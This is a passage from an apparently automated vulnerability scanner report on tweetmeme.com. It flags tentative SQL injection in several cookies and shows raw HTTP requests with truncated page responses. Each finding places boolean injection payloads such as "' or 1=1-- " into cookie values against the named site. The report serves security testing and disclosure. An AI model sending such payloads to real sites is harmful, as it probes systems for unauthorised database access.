<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Wor
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=74775951654">
   </iframe>
</div><!-- advert: home_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=74312408758" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my&hellip;
</a> -&nbsp;<span class="green">291&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking&hellip;
</a> -&nbsp;<span class="green">629&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">


...[SNIP]...

Request 2

GET /story/1452917957/ HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=83547739'%20or%201%3d2--%20; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:45 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0041038990020752
X-Served-In: 0.025541067123413
X-Served-By: ded2059
Content-Length: 35049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Wor
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=77835161181">
   </iframe>
</div><!-- advert: home_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=29484591686" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my&hellip;
</a> -&nbsp;<span class="green">291&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking&hellip;
</a> -&nbsp;<span class="green">629&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">


...[SNIP]...

1.42. http://tweetmeme.com/story/3636556715/ [__csref cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tweetmeme.com
Path:   /story/3636556715/

Issue detail

The __csref cookie appears to be vulnerable to SQL injection attacks. The payloads 94666970'%20or%201%3d1--%20 and 94666970'%20or%201%3d2--%20 were each submitted in the __csref cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /story/3636556715/ HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=94666970'%20or%201%3d1--%20; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:48:40 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0072450637817383
X-Served-In: 0.028326988220215
X-Served-By: h02
Content-Length: 33715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
New
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=7459401286">
   </iframe>
</div><!-- advert: home_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=42830250518" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my&hellip;
</a> -&nbsp;<span class="green">291&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking&hellip;
</a> -&nbsp;<span class="green">629&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">


...[SNIP]...

Request 2

GET /story/3636556715/ HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=94666970'%20or%201%3d2--%20; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:48:43 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0034580230712891
X-Served-In: 0.030218124389648
X-Served-By: h02
Content-Length: 33725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
New
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=30407187526">
   </iframe>
</div><!-- advert: home_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=71437292459" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my&hellip;
</a> -&nbsp;<span class="green">291&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking&hellip;
</a> -&nbsp;<span class="green">629&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">


...[SNIP]...

1.43. http://tweetmeme.com/story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000 [tm_identity cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tweetmeme.com
Path:   /story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000

Issue detail

The tm_identity cookie appears to be vulnerable to SQL injection attacks. The payloads 32365738'%20or%201%3d1--%20 and 32365738'%20or%201%3d2--%20 were each submitted in the tm_identity cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe05632365738'%20or%201%3d1--%20; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:50 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0059370994567871
X-Served-In: 1.0348711013794
X-Served-By: ded2062
Content-Length: 41912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Vid
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=95525847187">
   </iframe>
</div><!-- advert: home_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=5170608887" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my&hellip;
</a> -&nbsp;<span class="green">291&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking&hellip;
</a> -&nbsp;<span class="green">629&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">


...[SNIP]...

Request 2

GET /story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe05632365738'%20or%201%3d2--%20; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:46:53 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0051429271697998
X-Served-In: 1.036278963089
X-Served-By: h03
Content-Length: 41922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Vid
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=27425754144">
   </iframe>
</div><!-- advert: home_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=85382011911" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my&hellip;
</a> -&nbsp;<span class="green">291&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking&hellip;
</a> -&nbsp;<span class="green">629&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">


...[SNIP]...

1.44. http://tweetmeme.com/story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid [__utmv cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tweetmeme.com
Path:   /story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid

Issue detail

The __utmv cookie appears to be vulnerable to SQL injection attacks. The payloads 19840181'%20or%201%3d1--%20 and 19840181'%20or%201%3d2--%20 were each submitted in the __utmv cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=19840181'%20or%201%3d1--%20; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:41:52 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.011123895645142
X-Served-In: 1.0946009159088
X-Served-By: h04
Content-Length: 41335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Kev
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=74397597485">
   </iframe>
</div><!-- advert: home_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=25266362030" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my&hellip;
</a> -&nbsp;<span class="green">291&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking&hellip;
</a> -&nbsp;<span class="green">629&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">


...[SNIP]...

Request 2

GET /story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=19840181'%20or%201%3d2--%20; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:41:54 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0042209625244141
X-Served-In: 1.0478310585022
X-Served-By: ded2062
Content-Length: 41325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Kev
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=250&rand=80487986150">
   </iframe>
</div><!-- advert: home_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=9368828565" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835696312/dutch-teens-photos-boys-at-other-schools-boys-at-my-school-plixi" title="dutch teen's photos - boys at other schools, boys at my school. | Plixi">

dutch teen's photos - boys at other schools, boys at my&hellip;
</a> -&nbsp;<span class="green">291&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835339927/faithful-facebook-pope-benedict-blesses-social-networking-time-newsfeed" title="Faithful Facebook: Pope Benedict Blesses Social Networking - TIME NewsFeed">

Faithful Facebook: Pope Benedict Blesses Social Networking&hellip;
</a> -&nbsp;<span class="green">629&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">


...[SNIP]...

1.45. http://tweetmeme.com/story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday [__csv cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tweetmeme.com
Path:   /story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday

Issue detail

The __csv cookie appears to be vulnerable to SQL injection attacks. The payloads 65272576'%20or%201%3d1--%20 and 65272576'%20or%201%3d2--%20 were each submitted in the __csv cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c65272576'%20or%201%3d1--%20; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:44:49 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0037760734558105
X-Served-In: 0.033467054367065
X-Served-By: h02
Content-Length: 51437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Goo
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=technology&width=300&height=250&rand=71206812848">
   </iframe>
</div><!-- advert: technology_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=technology&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=technology&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=58939708341" alt="*" width="1" height="1" /><div class="new item">

<h2 class="new">Top Stories Right Now</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3834773149/an-open-letter-to-the-smiley-face-following-an-insult" title="An Open Letter to the Smiley Face Following an Insult">

An Open Letter to the Smiley Face Following an Insult
</a> -&nbsp;<span class="green">206&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835745639/windows-phone-7-jailbreak-devs-genuinely-excited-by-microsofts-roadmap-engadget" title="Windows Phone 7 jailbreak devs 'genuinely excited' by Microsoft's roadmap -- Engadget">

Windows Phone 7 jailbreak devs 'genuinely excited' by&hellip;
</a> -&nbsp;<span class="green">422&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
